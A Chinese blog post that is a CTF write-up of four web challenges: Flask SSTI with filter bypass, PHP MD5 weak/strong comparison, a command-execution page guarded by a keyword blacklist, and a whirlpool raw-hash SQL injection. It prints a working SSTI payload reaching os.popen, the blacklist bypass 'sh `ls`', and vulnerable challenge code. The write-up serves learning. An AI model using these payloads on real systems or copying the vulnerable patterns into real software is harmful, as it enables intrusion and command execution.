安恒2020年2月月赛

2020-02-26

记录一下此次Web的四道题

easyflask

flask SSTI

过滤了.和_

这个题我没做出来，看了赛后师傅的wp，简单记录一下

过滤点，可以用中括号括起来或者用attr()、getattr()绕过

过滤下划线，可以用request[‘arg’]绕过或dir(0)[0][0]绕过
给一下payload

{{()|attr(request['args']['x1'])|attr(request['args']['x2'])|attr(request['args']['x3'])()|attr(request['args']['x4'])(233)|attr(request['args']['x5'])|attr(request['args']['x6'])|attr(request['args']['x4'])(request['args']['x7'])|attr(request['args']['x4'])(request['args']['x8'])(request['args']['x9'])}}?x1=__class__&x2=__base__&x3=__subclasses__&x4=__getitem__&x5=__init__&x6=__globals__&x7=__builtins__&x8=eval&x9=__import__("os").popen('想要执行的命令').read()

easyhash

<?php
highlight_file(__FILE__);
error_reporting(0);
$val1 = @$_GET['val1'];
$val2 = @$_GET['val2'];
$val3 = @$_GET['val3'];
$val4 = @$_GET['val4'];
$val5 = (string)@$_POST['val5'];
$val6 = (string)@$_POST['val6'];
$val7 = (string)@$_POST['val7'];
if( $val1 == $val2 ){
    die('val1 OR val2 no no no');
}
if( md5($val1) != md5($val2) ){
    die('step 1 fail');
}
if( $val3 == $val4 ){
    die('val3 OR val4 no no no');
}
if ( md5($val3) !== md5($val4)){
    die('step 2 fail');
}
if( $val5 == $val6 || $val5 == $val7 || $val6 == $val7 ){
    die('val5 OR val6 OR val7 no no no');
}
if (md5($val5) !== md5($val6) || md5($val6) !== md5($val7) || md5($val5) !== md5($val7)){
    die('step 3 fail');
}

if(!($_POST['a']) and !($_POST['b']))
{
    echo "come on!";
    die();
}
$a = $_POST['a'];
$b = $_POST['b'];
$m = $_GET['m'];
$n = $_GET['n'];

if (!(ctype_alnum($a)) || (strlen($a) > 5)  || !(ctype_alnum($b)) || (strlen($b) > 6))
{
    echo "a OR b fail!";
    die();
}

if ((strlen($m) > 1) || (strlen($n) > 1))
{
    echo "m OR n fail";
    die();
}

$val8 = md5($a);
$val9 = strtr(md5($b), $m, $n);

echo PHP_EOL;
echo "<p>val8 : $val8</p>";
echo PHP_EOL;
echo "<p>val9 : $val9</p>";
echo PHP_EOL;
if (($val8 == $val9) && !($a === $b) && (strlen($b) === 5))
{
    echo "nice,good job,give you flag:";
    echo file_get_contents('/var/www/html/flag.php');
}

变量1234弱类型和数组过，567md5强碰撞，a和b需要爆破一下五位数的哈希值，要求以0e开头，后面最多有一个数字，然后用m和n替换，得到flag即可

commix

这个题我看的时候已经被日传了，命令执行，简单waf

<html>
<body>
<h3>This is the command practice</h3>
<form action="index.php" method="post">
<input value="" name='cmd'>
<input type="submit" value="Submit" />
</form>

<?php
$cmd=$_POST['cmd'];
$blacklist="cat|\/|cd|flag|curl|{|\(|'|\"|echo|\\\\|&|grep|base64";
$arr=explode('|',$blacklist);
foreach ($arr as $key => $value) {
    #var_dump($value);
    if (preg_match("/$value/i", $cmd)) {
    exit('hacker~~~');
    }
}
system($cmd);

?>
</html>

绕过方式有很多，可以使用以下命令

sh `ls`

HashisTrure

关键代码如下

<?php
$ps = mysql_real_escape_string($ps);
$ps = hash("whirlpool",$ps, true);
$result = mysql_query("select * from users where user_id='$id' and user_ps='$ps'");
?>

hash(“whirlpool”,$ps, true);

hash第一个参数为whirlpool，使得生成的散列值为二进制串。任何字符都可能出现在字符串内
当hash中存在

'='

时，语句变为

1	select * from users where user_id='$id' and user_ps='xxx'='xxxx'

第一步运算 user_ps=’XXXX’得到一个int值。由于不相等应该等于0.

第二步运算 int值与字符串比较，会把字符串转换为int，转换结果也等于0

形成注入，爆破可得密码为364383，登录即可

本文作者： yd0ng
本文链接： https://yd0ng.github.io/2020/02/26/%E5%AE%89%E6%81%922020%E5%B9%B41%E6%9C%88%E6%9C%88%E8%B5%9B/
版权声明： 本作品采用知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议进行许可。转载请注明出处！